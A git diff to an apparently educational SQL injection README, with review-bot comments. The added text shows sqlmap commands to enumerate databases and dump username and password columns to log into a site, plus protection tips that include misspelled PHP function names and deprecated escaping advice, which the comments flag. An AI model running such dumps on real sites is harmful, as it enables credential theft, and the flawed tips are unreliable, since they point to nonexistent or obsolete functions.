diff --git a/Web_Exploits/SQLi/README.md b/Web_Exploits/SQLi/README.md index 319e7d9..88d5908 100644 --- a/Web_Exploits/SQLi/README.md +++ b/Web_Exploits/SQLi/README.md @@ -1,5 +1,7 @@ # SQL Injections (SQLi) +![](http://i.imgur.com/AcVJKT2.png) + * A SQL query search can be easily manipulated and assume that a SQL query search is a reliable command. This means that SQL searches are capable of passing, unnoticed, by access control mechanisms. * Using methods of diverting standard authentication and by checking the authorization credentials, you can gain access to important information stored in a database. 
@@ -94,7 +96,56 @@ $ ./sqlmap.py -u --dbs (...) ``` -From this we can verify what databases we have available, for example. From this we can find out how many tables exist, and their respective names. The sqlmap command is ```--tables ```. +#### Gaining access to the Database +* From this we can verify what databases we have available, for example. From this we can find out how many tables exist, and their respective names. The sqlmap command is: +``` +./sqlmap -u --tables +``` + +* The main objective is to find usernames and passwords in order to gain access/login to the site, for example in a table named *users*. The sqlmap command is + +``` +./sqlmap -u --columns -D -T +``` + +This will return information about the columns in the given table. + +* Now we can dump all the data of all columns using the flag ```-C``` for column names: + +``` +./sqlmap -u --columns -D -T -C 'id,name,password,login,email' --dump +``` + +If the password are clear text (not hashed in md5, etc), we have access to the website. + +## Some Protection Tips + +* Never connect to a database as a super user or as a root. +* Sanitize any user input. PHP has several functions that validate functions such as: + - is_numeric() + - ctype_digit() + - settype() + - addslahes() + - str_replace() +* Add quotes ```"``` to all non-numeric input values that will be passed to the database by using escape chars functions: + - mysql_real_escape_string() + - sqlit_escape_string() + +```php +$name = 'John'; +$name = mysql_real_escape_string($name); +$SQL = "SELECT * FROM users WHERE username='$name'"; +``` + +* Always perform a parse of data that is received from the user (POST and FORM methods). + - The chars to be checked:```", ', whitespace, ;, =, <, >, !, --, #, //```. + - The reserved words: SELECT, INSERT, UPDATE, DELETE, JOIN, WHERE, LEFT, INNER, NOT, IN, LIKE, TRUNCATE, DROP, CREATE, ALTER, DELIMITER. + +* Do not display explicit error messages that show the request or a part of the SQL request. 
+ +* Erase user accounts that are not used (and default accounts). + +* Other tools: blacklists, AMNESIA, Java Static Tainting, Codeigniter.
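Review bot: the image added under `# SQL Injections (SQLi)` in the first hunk, `+![](http://i.imgur.com/AcVJKT2.png)`, has empty alt text and is hot-linked over plain http from a third-party host; give it alt text saying what it depicts and either use an https URL or commit the image into the repo so the README neither breaks if the external link disappears nor pulls mixed content when rendered over https.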
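Review bot: two function names in the new `## Some Protection Tips` list in the second hunk are misspelled and point readers at functions that do not exist: `- addslahes()` should be `addslashes()` and `- sqlit_escape_string()` should be `sqlite_escape_string()`. The `php` snippet in the same section relies on `mysql_real_escape_string()`, which belongs to the old `mysql_*` extension (deprecated in PHP 5.5, removed in PHP 7); the tip should lead with prepared statements (PDO or `mysqli` with bound parameters) and present string escaping only as a fallback for legacy code. The sqlmap examples also need attention: the unchanged context uses `./sqlmap.py` while the added lines use `./sqlmap`, and `./sqlmap -u --columns -D -T` gives no value after `-u`, `-D` or `-T`, so sqlmap would take the next flag as the argument; use placeholders like `-u <url> -D <db> -T <table>` consistently. The third command is introduced as dumping all columns, but it combines `--columns` (enumerate column names) with `-C 'id,name,password,login,email' --dump` (dump only the listed columns); drop `--columns` and say it dumps the listed columns. Minor grammar: "If the password are clear text" should read "If the passwords are in clear text", and "several functions that validate functions such as" should read "several functions that validate input, such as".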